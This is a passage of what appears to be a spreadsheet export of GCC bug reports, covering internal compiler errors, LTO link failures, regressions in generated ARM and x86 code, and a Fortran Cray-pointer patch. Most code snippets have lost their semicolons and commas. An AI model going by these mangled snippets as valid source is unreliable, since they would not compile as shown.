inline QString &amp;QString::prepend( const char* s )
{ return insert(0s) }
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-51040</t>
  </si>
  <si>
    <t>ICE: RTL check: access of elt 1 of 'not' with last elt 0 in gen_rtx_fmt_ee_stat at ./genrtl.h:33 with __atomic_nand_fetch()</t>
  </si>
  <si>
    <t>Created attachment 25759
reduced testcase
Compiler output:
$ gcc testcase.c 
testcase.c: In function 'foo':
testcase.c:6:30: internal compiler error: RTL check: access of elt 1 of 'not' with last elt 0 in gen_rtx_fmt_ee_stat at ./genrtl.h:33
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
RTL checking might be needed to reproduce this.
Tested revisions:
r181174 - crash</t>
  </si>
  <si>
    <t>GCC-42320</t>
  </si>
  <si>
    <t>link error with -flto  (undefined reference to 'non-virtual thunk ...)</t>
  </si>
  <si>
    <t>(This is not the same issue as 37352.)
&gt; cat Base.hh
struct Base1 {
        virtual ~Base1() {}
}
struct Base2 {
        virtual void f() = 0
}
struct Base : Base1 Base2 {
        virtual void f()
}
&gt; cat Base.cc
#include Base.hh
void Base::f() {}
&gt; cat Foo.cc
#include Base.hh
struct Foo : Base {
        virtual void g()
}
void Foo::g() {}
int main() {}
&gt; g++ -flto -c Base.cc
&gt; g++ -flto -c Foo.cc
&gt; g++ -flto Base.o Foo.o 2&gt;&amp;1 | c++filt
/usr/bin/ld: /tmp/ccqIEJHE.lto.o: in function vtable for Base:Base.o(.gnu.linkonce.r._ZTV4Base+0x38): error: undefined reference to 'non-virtual thunk to Base::f()'
/usr/bin/ld: /tmp/ccqIEJHE.lto.o: in function vtable for Foo:Base.o(.gnu.linkonce.r._ZTV3Foo+0x40): error: undefined reference to 'non-virtual thunk to Base::f()'
Without using -flto this links just fine.
I'm using SVN revision trunk@155034 on linux x86_64.</t>
  </si>
  <si>
    <t>GCC-28623</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE in extract_insn at recog.c:2077 (nrecognizable insn) [alpha]</t>
  </si>
  <si>
    <t>We get the following ICE on alpha with 4.1 and 4.2.  gcc 4.0 works.
tbm@hulk:~$ gcc-4.1 -c -O kdegraphics-gstring.cpp
kdegraphics-gstring.cpp: In member function 'GP GStringRep::vformat(va_list) const':
kdegraphics-gstring.cpp:57: error: unrecognizable insn:
(insn 15 10 16 0 (set (reg:DI 73)
        (plus:DI (reg/v/f:DI 69 [ buffer ])
            (const_int 32768 [0x8000]))) -1 (nil)
    (nil))
kdegraphics-gstring.cpp:57: internal compiler error: in extract_insn at recog.c:2084
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
Preprocessed source stored into /tmp/ccG6Sh3U.out file please attach this to your bugreport.
tbm@hulk:~$ /usr/lib/gcc-snapshot/bin/g++ -c -O kdegraphics-gstring.cpp
kdegraphics-gstring.cpp: In member function 'GP GStringRep::vformat(va_list) const':
kdegraphics-gstring.cpp:57: error: unrecognizable insn:
(insn 14 10 15 2 (set (reg:DI 73)
        (plus:DI (reg/v/f:DI 69 [ buffer ])
            (const_int 32768 [0x8000]))) -1 (nil)
    (nil))
kdegraphics-gstring.cpp:57: internal compiler error: in extract_insn at recog.c:2077
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
tbm@hulk:~$ gcc-4.0 -c -O kdegraphics-gstring.cpp
tbm@hulk:~$</t>
  </si>
  <si>
    <t>GCC-48930</t>
  </si>
  <si>
    <t>[C++0x] Invalid implicitly declared default c'tor</t>
  </si>
  <si>
    <t>gcc 4.7.0 20110430 (experimental) in C++0x mode accepts the following code:
//-------
struct C {
  C(const C
} c1
C c2{}
//-------
It shouldn't the code is ill-formed because there is a user-declared (but not user-provided) copy-constructor. According to [class.ctor]p.5 the default constructor of C should not be implicitly declared in this case. The defect exists independent of the way a default-constructed variable of type C is declared or whether a defaulted move constructor is added or not.</t>
  </si>
  <si>
    <t>CLASSPATH-23285</t>
  </si>
  <si>
    <t>jawt implementation disappeared after the big merge</t>
  </si>
  <si>
    <t>During the big merge gcc//libjava/jni/gtk-peer/gtk_jawt.c was removed.
But that file wasn't merged yet into classpath. It should be readded in
classpath under gcc/libjava/classpath/native/jni/gtk-peer (or better yet
'upstream').</t>
  </si>
  <si>
    <t>GCC-39838</t>
  </si>
  <si>
    <t>[6 regression] unoptimal code for two simple loops</t>
  </si>
  <si>
    <t>The following code:
struct A
{
  int count
  int *data
}
void func(int int)
void test (struct A* p const void **ptrArray int count)
{
  int i j
  for (i = 0 i count i++)
    {
      for (j = 0 j &lt; count j++)
        {
          func (p-&gt;data[i] p-&gt;data[i + 1])
        }
    }
}
is compiled to 50 bytes by GCC 4.2.1 and to 56 bytes by GCC 4.4.0 (and GCC 4.3.1 also) on ARM in thumb mode
GCC 4.2.1 (with -march=armv5te -mthumb -mthumb-interwork -fpic -Os)
test:
        push    {r4 r5 r6 r7 lr}
        sub     sp sp #12
        mov     r7 r0
        mov     r5 #0
        str     r2 [sp #4]
        b       .L2
.L3:
        ldr     r3 [r7 #4]
        add     r4 r4 #1
        ldr     r0 [r3 r6]
        add     r3 r6 r3
        ldr     r1 [r3 #4]
        bl      func
.L5:
        ldr     r3 [sp #4]
        cmp     r4 r3
        blt     .L3
        add     r5 r5 #1
.L2:
        ldr     r3 [r7]
        cmp     r5 r3
        bge     .L6
        lsl     r6 r5 #2
        mov     r4 #0
        b       .L5
.L6:
        add     sp sp #12
        @ sp needed for prologue
        pop     {r4 r5 r6 r7 pc}
GCC 4.4.0:
test:
        push    {r4 r5 r6 r7 lr}
        sub     sp sp #12
        mov     r4 r0
        str     r2 [sp #4]
        mov     r7 #4          // doesn't exist in 4.2.1
        mov     r5 #0
        b       .L2
.L3:
        ldr     r3 [r4 #4]
        ldr     r2 [sp]
        ldr     r1 [r3 r7]
        ldr     r0 [r3 r2]
        bl      func
        add     r6 r6 #1
.L5:
        ldr     r3 [sp #4]
        cmp     r6 r3
        blt     .L3
        add     r5 r5 #1
        add     r7 r7 #4      // doesn't exist in 4.2.1
.L2:
        ldr     r3 [r4]
        cmp     r5 r3
        bge     .L6
        lsl     r2 r5 #2
        str     r2 [sp]        // doesn't exist in 4.2.1
        mov     r6 #0
        b       .L5
.L6:
        add     sp sp #12
        @ sp needed for prologue
        pop     {r4 r5 r6 r7 pc}
Changing -Os to -O2 produces even worse code (50-&gt;64 56-&gt;74 +6 -&gt; +10).
Bisection on trunk shows that it was changed by http://gcc.gnu.org/viewcvs?view=rev&amp;revision=125755 which was a merge of pointer_plus branch (therefore adding Andrew Pinski in cc).
It also reproduces on x86 as well:
GCC 4.2.4 with -m32 -O2:
test:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %edi
        pushl   %esi
        pushl   %ebx
        subl    $12 %esp
        movl    8(%ebp) %edi
        movl    $0 -16(%ebp)
        movl    (%edi) %edx
        testl   %edx %edx
        jle     .L8
.L4:
        movl    16(%ebp) %eax
        testl   %eax %eax
        jle     .L6
        movl    -16(%ebp) %esi
        xorl    %ebx %ebx
        sall    $2 %esi
        .p2align 47
.L5:
        movl    4(%edi) %eax
        addl    $1 %ebx
        movl    4(%esi%eax) %edx
        movl    %edx 4(%esp)
        movl    (%eax%esi) %eax
        movl    %eax (%esp)
        call    func
        cmpl    16(%ebp) %ebx
        jne     .L5
.L6:
        addl    $1 -16(%ebp)
        movl    -16(%ebp) %eax
        cmpl    %eax (%edi)
        jg      .L4
.L8:
        addl    $12 %esp
        popl    %ebx
        popl    %esi
        popl    %edi
        popl    %ebp
        ret
GCC 4.4.0 (with the same options):
test:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %edi
        pushl   %esi
        movl    $4 %esi
        pushl   %ebx
        subl    $44 %esp
        movl    8(%ebp) %edi
        movl    $0 -28(%ebp)
        movl    (%edi) %edx
        testl   %edx %edx
        jle     .L6
        .p2align 47
        .p2align 3
.L3:
        movl    16(%ebp) %eax
        testl   %eax %eax
        jle     .L5
        movl    -28(%ebp) %ecx
        movl    %edi %eax
        xorl    %ebx %ebx
        sall    $2 %ecx
        movl    %ecx %edi
        movl    %eax %ecx
        .p2align 47
        .p2align 3
.L4:
        movl    4(%ecx) %eax
        addl    $1 %ebx
        movl    %ecx -32(%ebp)
        movl    (%eax%esi) %edx
        movl    %edx 4(%esp)
        movl    (%eax%edi) %eax
        movl    %eax (%esp)
        call    func
        movl    -32(%ebp) %ecx
        cmpl    %ebx 16(%ebp)
        jg      .L4
        movl    %ecx %edi
.L5:
        addl    $1 -28(%ebp)
        addl    $4 %esi
        movl    -28(%ebp) %eax
        cmpl    %eax (%edi)
        jg      .L3
.L6:
        addl    $44 %esp
        popl    %ebx
        popl    %esi
        popl    %edi
        popl    %ebp
        ret
Some stat by instructions:
$ cat 1.s|grep -v '[.:]'|awk '{print $1}'|sort|uniq -c|sort -g
      1 call
      1 ret
      1 sall
      1 subl
      1 xorl
      2 cmpl
      2 testl
      3 addl
      4 popl
      4 pushl
     12 movl
$ cat 2.s|grep -v '[.:]'|awk '{print $1}'|sort|uniq -c|sort -g
      1 call
      1 ret
      1 sall
      1 subl
      1 xorl
      2 cmpl
      2 testl
      4 addl
      4 popl
      4 pushl
     19 movl
12-&gt;19 movl's is not very good.</t>
  </si>
  <si>
    <t>alexvod</t>
  </si>
  <si>
    <t>GCC-82725</t>
  </si>
  <si>
    <t>[8 Regression] [x86_64] internal compiler error: in change_address_1 at emit-rtl.c:2162</t>
  </si>
  <si>
    <t>Reduced test triggered only if compiling with -fPIE and affects multiple front-ends.
---
struct string
{
  __SIZE_TYPE__ length
  const char *ptr
}
string tempDir()
{
    thread_local string cache
    return cache
}
---
during RTL pass: split2
file.cc: In function â€˜string tempDir()â€™:
file.cc:11:1: internal compiler error: in change_address_1 at emit-rtl.c:2162
 }
 ^
0x58cddf change_address_1
	../../dev/gcc/emit-rtl.c:2162
0x89d98d adjust_address_1(rtx_def* machine_mode long int int int long)
	../../dev/gcc/emit-rtl.c:2300
0xe19010 split_double_mode(machine_mode rtx_def** int rtx_def** rtx_def**)
	../../dev/gcc/config/i386/i386.c:19985
0xe1a72b ix86_split_to_parts
	../../dev/gcc/config/i386/i386.c:26573
0xe23056 ix86_split_long_move(rtx_def**)
	../../dev/gcc/config/i386/i386.c:26662
0x1009005 gen_split_23(rtx_insn* rtx_def**)
	../../dev/gcc/config/i386/i386.md:2362
0x125d437 split_12
	../../dev/gcc/config/i386/i386.md:1016
0x125f74c split_18
	../../dev/gcc/config/i386/i386.md:6491
0x12690a0 split_insns(rtx_def* rtx_insn*)
	../../dev/gcc/config/i386/i386.md:12747
0x89fb74 try_split(rtx_def* rtx_insn* int)
	../../dev/gcc/emit-rtl.c:3692
0xad1071 split_insn
	../../dev/gcc/recog.c:2882
0xad5da7 split_all_insns()
	../../dev/gcc/recog.c:2971
0xad5e68 execute
	../../dev/gcc/recog.c:3883
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
---
This has been happening since mid-September at least.
$ g++ --version
g++ (GCC) 8.0.0 20170918 (experimental)
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>ibuclaw</t>
  </si>
  <si>
    <t>GCC-78626</t>
  </si>
  <si>
    <t>[7 Regression] ICE in rtl_verify_bb_insns at cfgrtl.c:2656 (error: flow control insn inside a basic block)</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20161127 snapshot ICEs when compiling the following reduced snippet for 32-bit BE powerpc w/ -Os:
int qs
void
ms (int g1)
{
  int cy
  int *fr = 
  for ()
    {
      *fr = 1
      fr = 
      while (qs != 0)
        {
          if (qs | cy)
            qs = g1 / 0
          ++qs
        }
      cy = 1
      while (cy != 0)
        cy = 2
    }
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20161127 -Os -w -c mfzov3v7.c
mfzov3v7.c: In function 'ms':
mfzov3v7.c:25:1: error: in basic block 3:
 }
 ^
mfzov3v7.c:25:1: error: flow control insn inside a basic block
(insn 58 19 25 3 (trap_if (const_int 1 [0x1])
        (const_int 0 [0])) 823 {trap}
     (nil))
mfzov3v7.c:25:1: internal compiler error: in rtl_verify_bb_insns at cfgrtl.c:2656
0x2edfb398605 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/rtl-error.c:108
0x2edfaf5fe87 rtl_verify_bb_insns
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfgrtl.c:2656
0x2edfaf5fe87 rtl_verify_flow_info_1
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfgrtl.c:2742
0x2edfaf4c08d verify_flow_info()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/cfghooks.c:258
0x2edfb322eb1 execute_function_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/passes.c:1977
0x2edfb323cfb execute_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161127/work/gcc-7-20161127/gcc/passes.c:2015
Applying r242947 and (or) r243028 doesn't fix it.</t>
  </si>
  <si>
    <t>GCC-5693</t>
  </si>
  <si>
    <t>Reload problem</t>
  </si>
  <si>
    <t>The attached testcase fails on powerpc-linux-gnu if compiled with -O2.
This works fine in 3.0.x.
ppd.c: In function `ppd_read':
ppd.c:271: unrecognizable insn:
(insn 1250 1248 94 (set (mem:CC (plus:SI (plus:SI (reg/f:SI 1 r1)
                    (const_int 65536 [0x10000]))
                (const_int 8 [0x8])) [12 S4 A32])
        (reg:CC 9 r9)) -1 (nil)
    (nil))
ppd.c:271: Internal compiler error in extract_insn at recog.c:2129
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
current gcc-3.1
Environment:
powerpc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-3706</t>
  </si>
  <si>
    <t>ABI:covariant returns and virtual inheritance</t>
  </si>
  <si>
    <t>When using covariant returns (such as in virtual constructors)
in conjunction with virtual inheritance g++ gives the error:
foo.cpp:8: sorry not implemented: adjusting pointers for covariant returns
Behavior for non-virtual inheritance is correct.
I tried this with gcc 2.95.3 gcc 3.0 and the latest snapshot using CodeSourcery's
online compiler as of July 17 2001.
Release:
3.0
Environment:
System: SunOS dortmund 5.6 Generic_105181-05 sun4u sparc SUNWUltra-60
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../gcc-3.0/configure --prefix=/usr/local/gcc3
How-To-Repeat:
class A
{
  public:
  virtual A* clone() const = 0
}
class B: public virtual A
{
  public:
  virtual B* clone() const {return(new B(*this))}
}
int main()
{
  B* b = new B
  B* c = b-&gt;clone()
  return 0
}</t>
  </si>
  <si>
    <t>j.hannemann</t>
  </si>
  <si>
    <t>GCC-5443</t>
  </si>
  <si>
    <t>build cross compiler gcc 3.0.2 - as: unrecognized option `-x'</t>
  </si>
  <si>
    <t>error when building a cross compiler gcc-3.0.2 on an i686-pc-linux-gnu
                                     (for an ia64-unknown-linux)
message: as: unrecognized option `-x'
the native installed compiler on the i686 machine is a ...
gcc version 2.95.3 20010315 (SuSE)
(specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.3/specs)
...which is invoked using
export CC=/usr/bin/gcc
system type: i686-pc-linux-gnu
configured using: ../gcc-3.0.2/configure --target=ia64-unknown-linux --prefix=/usr
/local/ia64
preprocessed file: none
my installation attempt with: make all install
stops with:
make[1]: Entering directory `/home/root/system/ia64/build-gcc/libiberty'
make[2]: Entering directory `/home/root/system/ia64/build-gcc/libiberty/testsuite'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/home/root/system/ia64/build-gcc/libiberty/testsuite'
make[1]: Leaving directory `/home/root/system/ia64/build-gcc/libiberty'
make[1]: Entering directory `/home/root/system/ia64/build-gcc/zlib'
true AR_FLAGS=rc CC_FOR_BUILD=/usr/bin/gcc CFLAGS=-g -O2 CXXFLAGS=-g -O2 
CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET=-g -O2 INSTALL=/bin/sh /root/home/system/i
a64/gcc-3.0.2/install-sh -c INSTALL_DATA=/bin/sh /root/home/system/ia64/gcc-3.0.
2/install-sh -c -m 644 INSTALL_PROGRAM=/bin/sh /root/home/system/ia64/gcc-3.0.2/
install-sh -c  INSTALL_SCRIPT=/bin/sh /root/home/system/ia64/gcc-3.0.2/install-s
h -c LDFLAGS= LIBCFLAGS=-g -O2 LIBCFLAGS_FOR_TARGET=-g -O2 MAKE=make MAK
EINFO=makeinfo   PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT=expect
 RUNTEST=runtest RUNTESTFLAGS= exec_prefix=/usr/local/ia64 infodir=/usr/loc
al/ia64/info libdir=/usr/local/ia64/lib prefix=/usr/local/ia64 tooldir=/usr/
local/ia64/ia64-unknown-linux AR=ar AS=as CC=/usr/bin/gcc CXX=c++ LD=ld
 LIBCFLAGS=-g -O2 NM=nm PICFLAG= RANLIB=ranlib DESTDIR= DO=all multi-do
make[1]: Leaving directory `/home/root/system/ia64/build-gcc/zlib'
make[1]: Entering directory `/home/root/system/ia64/build-gcc/fastjar'
make[1]: Leaving directory `/home/root/system/ia64/build-gcc/fastjar'
make[1]: Entering directory `/home/root/system/ia64/build-gcc/gcc'
(cd intl &amp;&amp; make all)
make[2]: Entering directory `/home/root/system/ia64/build-gcc/gcc/intl'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/home/root/system/ia64/build-gcc/gcc/intl'
(cd po &amp;&amp; make all)
make[2]: Entering directory `/home/root/system/ia64/build-gcc/gcc/po'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/home/root/system/ia64/build-gcc/gcc/po'
if [ -f specs.ready ]  then \
        true \
else \
        echo timestamp &gt; specs.ready \
fi
/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system/ia64/build-gcc/gcc/ 
-B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/ia64-unknown-linux/lib
/ -isystem /usr/local/ia64/ia64-unknown-linux/include -c -o crtbegin.o ../../gcc-3
.0.2/gcc/config/ia64/crtbegin.asm
xgcc: ../../gcc-3.0.2/gcc/config/ia64/crtbegin.asm: linker input file unused becau
se linking not done
/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system/ia64/build-gcc/gcc/ 
-B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/ia64-unknown-linux/lib
/ -isystem /usr/local/ia64/ia64-unknown-linux/include -c -o crtend.o ../../gcc-3.0
.2/gcc/config/ia64/crtend.asm
xgcc: ../../gcc-3.0.2/gcc/config/ia64/crtend.asm: linker input file unused because
 linking not done
/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system/ia64/build-gcc/gcc/ 
-B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/ia64-unknown-linux/lib
/ -isystem /usr/local/ia64/ia64-unknown-linux/include -DSHARED -c -o crtbeginS.o .
./../gcc-3.0.2/gcc/config/ia64/crtbegin.asm
xgcc: ../../gcc-3.0.2/gcc/config/ia64/crtbegin.asm: linker input file unused becau
se linking not done
/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system/ia64/build-gcc/gcc/ 
-B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/ia64-unknown-linux/lib
/ -isystem /usr/local/ia64/ia64-unknown-linux/include -DSHARED -c -o crtendS.o ../
../gcc-3.0.2/gcc/config/ia64/crtend.asm
xgcc: ../../gcc-3.0.2/gcc/config/ia64/crtend.asm: linker input file unused because
 linking not done
make GCC_FOR_TARGET=/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system
/ia64/build-gcc/gcc/ -B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/i
a64-unknown-linux/lib/ -isystem /usr/local/ia64/ia64-unknown-linux/include \
  HOST_PREFIX= HOST_PREFIX_1=loser- \
  AR_FOR_TARGET=ia64-unknown-linux-ar \
  AR_CREATE_FOR_TARGET=ia64-unknown-linux-ar  rc \
  AR_FLAGS_FOR_TARGET= \
  OLDCC=cc CCLIBFLAGS=-O \
  CFLAGS=-g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
 -Wtraditional -pedantic -Wno-long-long \
  RANLIB_FOR_TARGET=ia64-unknown-linux-ranlib \
  RANLIB_TEST_FOR_TARGET=[ -f ia64-unknown-linux-ranlib ] || ( [ i686-pc-linux-g
nu = ia64-unknown-linux-gnu ] &amp;&amp; [ -f /usr/bin/ranlib -o -f /bin/ranlib ] ) \
  NM_FOR_TARGET=nm AWK=gawk \
  LIBGCC2_CFLAGS=-O2  -DCROSS_COMPILE -DIN_GCC    -W -Wall -Wwrite-strings -Wstri
ct-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D_
_GCC_FLOAT_NOT_NEEDED -Dinhibit_libc \
  INCLUDES=-I. -I. -I../../gcc-3.0.2/gcc -I../../gcc-3.0.2/gcc/. -I../../gcc-3.0.
2/gcc/config -I../../gcc-3.0.2/gcc/../include MAYBE_USE_COLLECT2= \
  CONFIG_H=tconfig.h  insn-codes.h insn-flags.h MACHMODE_H=machmode.h machmode.
def \
  LIB1ASMSRC='ia64/lib1funcs.asm' \
  MAKEOVERRIDES= \
  -f libgcc.mk all
make[2]: Entering directory `/home/root/system/ia64/build-gcc/gcc'
for d in libgcc do \
  if [ -d $d ] then true else mkdir $d fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
/root/home/system/ia64/build-gcc/gcc/xgcc -B/root/home/system/ia64/build-gcc/gcc/ 
-B/usr/local/ia64/ia64-unknown-linux/bin/ -B/usr/local/ia64/ia64-unknown-linux/lib
/ -isystem /usr/local/ia64/ia64-unknown-linux/include -O2  -DCROSS_COMPILE -DIN_GC
C    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./
include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -
I../../gcc-3.0.2/gcc -I../../gcc-3.0.2/gcc/. -I../../gcc-3.0.2/gcc/config -I../../
gcc-3.0.2/gcc/../include -DL__divtf3 -xassembler-with-cpp -c ../../gcc-3.0.2/gcc/c
onfig/ia64/lib1funcs.asm -o libgcc/./__divtf3.o
as: unrecognized option `-x'
make[2]: *** [libgcc/./__divtf3.o] Error 1
make[2]: Leaving directory `/home/root/system/ia64/build-gcc/gcc'
make[1]: *** [libgcc.a] Error 2
make[1]: Leaving directory `/home/root/system/ia64/build-gcc/gcc'
make: *** [all-gcc] Error 2
Release:
gcc-3.0.2
Environment:
i686-pc-linux-gnu
How-To-Repeat:
obvious from description</t>
  </si>
  <si>
    <t>weber</t>
  </si>
  <si>
    <t>GCC-41726</t>
  </si>
  <si>
    <t>Recursion prevention in gimple_get_alias_set should be revisited</t>
  </si>
  <si>
    <t>$summary
Mine.  Probably not for 4.5 though.</t>
  </si>
  <si>
    <t>GCC-19628</t>
  </si>
  <si>
    <t>[3.4 Regression] g++ no longer accepts __builtin_constant_p in constant-expressions</t>
  </si>
  <si>
    <t>The following test case is accepted by 3.3 (both C and C++) and by 4.0 C but not by 4.0 C++.
#define FOO(x) (__builtin_constant_p(x) ? 1 : 2)
int foo(int n) {
  switch(n) {
  case FOO(3):
    return 1
  default:
    return 2
  }
}
Was this change intentional?  Even if it was the C/C++ incompatibility is unfortunate.  This sort of 
construct is likely to appear in headers used by both languages.  (And we can't very well point to 
language standards in deciding whether __builtin_constant_p should be considered a constant-
expression since it's a GNU extension.)</t>
  </si>
  <si>
    <t>austern</t>
  </si>
  <si>
    <t>GCC-59003</t>
  </si>
  <si>
    <t>[4.9 Regression] profiledbootstrap miscompiles gcc during stagefeedback --with-tune=amdfam10</t>
  </si>
  <si>
    <t>% ../gcc/configure --enable-checking=release --disable-werror --disable-multilib --enable-languages=cc++
 % make -j4 BOOT_CFLAGS=-march=native -O3 -pipe STAGE1_CFLAGS=-march=native -O3 -pipe CFLAGS_FOR_TARGET=-march=native -O3 -pipe CXXFLAGS_FOR_TARGET=-march=native -O3 -pipe profiledbootstrap
...
/var/tmp/gcc_build_dir/./gcc/xgcc -B/var/tmp/gcc_build_dir/./gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -march=native -O3 -pipe -O2  -march=native -O3 -pipe -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -mlong-double-80 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -mlong-double-80 -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include -I../../../gcc/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o bid128_noncomp.o -MT bid128_noncomp.o -MD -MP -MF bid128_noncomp.dep -c ../../../gcc/libgcc/config/libbid/bid128_noncomp.c
/var/tmp/gcc_build_dir/./gcc/xgcc -B/var/tmp/gcc_build_dir/./gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -march=native -O3 -pipe -O2  -march=native -O3 -pipe -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -mlong-double-80 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -mlong-double-80 -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include -I../../../gcc/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o bid128_fma.o -MT bid128_fma.o -MD -MP -MF bid128_fma.dep -c ../../../gcc/libgcc/config/libbid/bid128_fma.c
In file included from ../../../gcc/libgcc/config/libbid/bid_internal.h:27:0
                 from ../../../gcc/libgcc/config/libbid/bid64_noncomp.c:24:
../../../gcc/libgcc/config/libbid/bid64_noncomp.c: In function â€˜__bid64_isInfâ€™:
../../../gcc/libgcc/config/libbid/bid_conf.h:258:21: internal compiler error: Segmentation fault
 #define bid64_isInf __bid64_isInf
                     ^
../../../gcc/libgcc/config/libbid/bid64_noncomp.c:220:1: note: in expansion of macro â€˜bid64_isInfâ€™
 bid64_isInf (UINT64 x _EXC_MASKS_PARAM _EXC_INFO_PARAM) {
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [bid64_noncomp.o] Error 1
Looks like gcc got miscompiled during stagefeedback.
-march=native is amdfam10 on my machine.
Without --enable-checking=release gcc builds fine.</t>
  </si>
  <si>
    <t>GCC-62174</t>
  </si>
  <si>
    <t>Component declarations overwrite types of Cray Pointee variables</t>
  </si>
  <si>
    <t>Created attachment 33353
Proposed patch for the described problem
The typespecs for Cray pointees are overwritten by the typespecs of components with the same name which are declared later.
This problem was introduced with Cray pointer support in 4.1.0 and is present as far as I can tell up through the current release.
Here is a proposed patch from 4.8.3. The added test case demonstrates the problem:
diff --git a/gcc/fortran/decl.c b/gcc/fortran/decl.c
index 4048ac9..7b3c59a 100644
--- a/gcc/fortran/decl.c
+++ b/gcc/fortran/decl.c
@@ -19048 +19049 @@ variable_decl (int elem)
     }
   /*  If this symbol has already shown up in a Cray Pointer declaration
+      and this is not a component declaration
       then we want to set the type &amp; bail out.  */
-  if (gfc_option.flag_cray_pointer)
+  if (gfc_option.flag_cray_pointer &amp;&amp; gfc_current_state () != COMP_DERIVED)
     {
       gfc_find_symbol (name gfc_current_ns 1 
       if (sym != NULL &amp;&amp; sym-&gt;attr.cray_pointee)
diff --git a/gcc/testsuite/gfortran.dg/cray_pointers_10.f90 b/gcc/testsuite/gfortran.dg/cray_pointers_10.f90
new file mode 100644
index 0000000..fcc0132
--- /dev/null
+++ b/gcc/testsuite/gfortran.dg/cray_pointers_10.f90
@@ -00 +122 @@
+! { dg-do compile }
+! { dg-options -fcray-pointer }
+!
+! Since the introduction of Cray pointers in 4.1.0 as late as 4.8.3
+! component declarations within derived types would overwrite the typespec of 
+! variables with the same name who were Cray pointees.
+implicit none
+
+type t1
+  integer i
+end type t1
+type(t1) x
+
+pointer (x_ptr x)
+
+type t2
+  real x ! should not overwrite x's type
+end type t2
+
+x%i = 0 ! should see no error here
+
+end
diff --git a/gcc/fortran/ChangeLog b/gcc/fortran/ChangeLog
index 53d2691..8d8f9d5 100644
--- a/gcc/fortran/ChangeLog
+++ b/gcc/fortran/ChangeLog
@@ -13 +18 @@
+2014-08-18  Fritz Reese  
